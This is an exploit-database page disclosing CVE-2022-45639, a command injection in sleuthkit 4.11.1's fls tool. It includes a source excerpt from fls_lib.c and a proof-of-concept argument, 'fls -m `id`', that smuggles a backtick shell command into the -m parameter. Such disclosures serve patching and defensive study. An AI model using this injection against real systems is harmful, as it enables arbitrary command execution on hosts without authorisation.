Sleuthkit 4.11.1 command injection Vulnerability / Exploit

  /     /     /  

Exploits / Vulnerability Discovered : 2023-04-03 | Type : local | Platform : multiple
This exploit / vulnerability Sleuthkit 4.11.1 command injection is for educational purposes only and if it is used you will do on your own risk!

---

[+] Code ...

# Exploit Title: sleuthkit 4.11.1 - Command Injection
# Date: 2023-01-20
# CVE-2022-45639
# Vendor Homepage: https://github.com/sleuthkit
# Vulnerability Type: Command injection
# Attack Type: Local
# Version: 4.11.1
# Exploit Author: Dino Barlattani, Giuseppe Granato
# Link poc: https://www.binaryworld.it/guidepoc.asp#CVE-2022-45639
# POC:

fls tool is affected by command injection in parameter "-m" when run on
linux system.
OS Command injection vulnerability in sleuthkit fls tool 4.11.1 allows
attackers to execute arbitrary commands
via a crafted value to the m parameter

when it run on linux, a user can insert in the -m parameter a buffer with
backtick with a shell command.
If it run with a web application as front end it can execute commands on
the remote server.

The function affected by the vulnerability is "tsk_fs_fls()" from the
"fls_lib.c" file

#ifdef TSK_WIN32
{
....
}
#else

data.macpre = tpre; <---------------

return tsk_fs_dir_walk(fs, inode, flags, print_dent_act, &data);

#endif

Run command:

$ fls -m `id` [Options]


--
*Dino Barlattani*
www.linkedin.com/in/dino-barlattani-10bba11a9/
www.binaryworld.it <http://Binaryworld.it>
www.youtube.com/user/dinbar78